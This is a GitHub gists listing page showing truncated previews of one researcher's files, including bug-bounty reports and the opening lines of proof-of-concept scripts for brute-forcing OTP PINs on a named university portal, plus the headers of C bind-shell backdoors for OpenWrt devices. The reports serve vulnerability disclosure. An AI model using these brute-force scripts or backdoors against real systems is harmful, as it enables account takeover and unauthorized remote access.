Piyush Raj 0x48piraj
0x48piraj
/ IGPPChecker.py
Created
February 28, 2019 18:11
Script that checks Instagram profile's visibility, whether a specific user has public/private account.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests, bs4 | |
| def checker(username): | |
| r = requests.get('https://instagram.com/' + str(username)) | |
| html = str(r.content) | |
| if 'private":true' in html: | |
| return True | |
| elif 'private":false' in html: | |
| return False | |
| else: |
0x48piraj
/ UI_BUG.TXT
Created
April 27, 2019 19:28
Mail.com UI Bug in Android Application (v 6.1.4)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Open the Mail.com android app (version=6.1.4), then goto "Add Account" | |
| Click on it. | |
| Login. (Dummy credentials, type anything) | |
| Click on the eye icon which allows users to show the password behind asterisks. | |
| Click on the password textbox again. | |
| Boom, app force stop. |
0x48piraj
/ win32print.cpp
Last active
May 4, 2019 19:54
Script taken for reference from mhammond/pywin32/ and can be found inside win32/src/win32print/
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*********************************************************** | |
| win32printmodule.cpp -- module for interface into printer API | |
| Note that this source file contains embedded documentation. | |
| This documentation consists of marked up text inside the | |
| C comments, and is prefixed with an '@' symbol. The source | |
| files are processed by a tool called "autoduck" which | |
| generates Windows .hlp files. |
0x48piraj
/ DMS-OTP-BYPASS.TXT
Last active
May 5, 2019 19:24
REPORT #1: Taking control over any account (both parent's & student's) via exposed OTP (One Time Password) pin on client's side (dms.jaipur.manipal.edu)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author : PIYUSH RAJ (0x48piraj) | |
| # Impact : Taking control over any account (both parent's & student's) via exposed OTP (One Time Password) pin on client's side | |
| # Vulnerability : Improper handling of sensitive data | |
| # Target : dms.jaipur.manipal.edu | |
| # Exploit: Javascript Injection (Proof-of-Concept provided) | |
| # Patched : Yes (Reported on https://bounty.jaipur.manipal.edu) | |
| # Vulnerable parameters : | |
| - hdnOTP | |
| - hdnStudentOTP |
0x48piraj
/ DMSBreaker.py
Created
May 5, 2019 19:27
POC in Python for Bruteforcing OTP PIN Efficiently (dms.jaipur.manipal.edu)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| from selenium import webdriver | |
| # Author : PIYUSH RAJ (0x48piraj) | |
| # Proof-of-Concept (POC) : Python 3 | |
| driver = webdriver.Firefox() | |
| driver.get("https://dms.jaipur.manipal.edu/loginForm.aspx") |
0x48piraj
/ DMSBrute.js
Created
May 5, 2019 19:27
POC in Javascript for Bruteforcing OTP PIN Efficiently (dms.jaipur.manipal.edu)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Author : PIYUSH RAJ (0x48piraj) | |
| // Proof-of-Concept (POC) : Javascript | |
| function sleepFor( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function check(combo){ | |
| document.getElementById("TxtStduentOTP").value = combo; |
0x48piraj
/ DMS-OTP-BRUTEFORCE.TXT
Created
May 5, 2019 19:28
REPORT #2: Bruteforcing OTP PIN Efficiently (dms.jaipur.manipal.edu)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Author : PIYUSH RAJ (0x48piraj) | |
| # Impact : Bruteforcing OTP PIN Efficiently (With POC) | |
| # Vulnerability : No lock-out policy | |
| # Exploit: Seq. Bruteforce Attack (Proof-of-Concept provided) | |
| Vulnerability : | |
| Due to no lock-out policy enabled, bruteforcing can be done. What makes it easily bruteforcable is the password strength, it consists of only 4 digits. | |
| This makes a total of 10,000 combinations. What's more interesting is the OTP PIN generated has always it's value par 1000, which helps reducing the total combinations by 1000. | |
| Making it only 9000. |
0x48piraj
/ bindshell-unstable.c
Last active
May 18, 2021 00:23
Bind shell network backdoor for embedded devices (tested on OpenWrt 18.06 firmware)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <stdlib.h> | |
| #define BACKDOOR_PORT 4444 | |
| /* Author: Piyush Raj (0x48piraj) | |
| * Bind Shell for OpenWrt 18.06 firmware, handles one connection per execution | |
| * Arch : i486 | |
| * ./i486-openwrt-linux-musl-gcc bindshell-unstable.c -o bindshell | |
| */ |
0x48piraj
/ node-vuln-resolver.sh
Last active
June 13, 2019 00:38
Auto Node Packages Vulnerability Resolver : Automatically fix vulnerable node packages in all public repositories you own at Github
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ############################################################### | |
| # Author : Piyush Raj <0x48piraj> # | |
| # Info : Auto Node Packages Vulnerability Resolver # | |
| ############################################################### | |
| printf "[*] Organisation => orgs" | |
| printf "[*] Individual => users" |
0x48piraj
/ bindshell-stable.c
Last active
October 4, 2020 12:44
Bind shell network backdoor for embedded devices (tested on OpenWrt 18.06 firmware)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <stdlib.h> | |
| #define BACKDOOR_PORT 4444 | |
| /* Author: Piyush Raj (0x48piraj) | |
| * Bind Shell for OpenWrt 18.06 firmware | |
| * Arch : i486 | |
| * ./i486-openwrt-linux-musl-gcc bindshell-stable.c -o bindshell | |
| */ |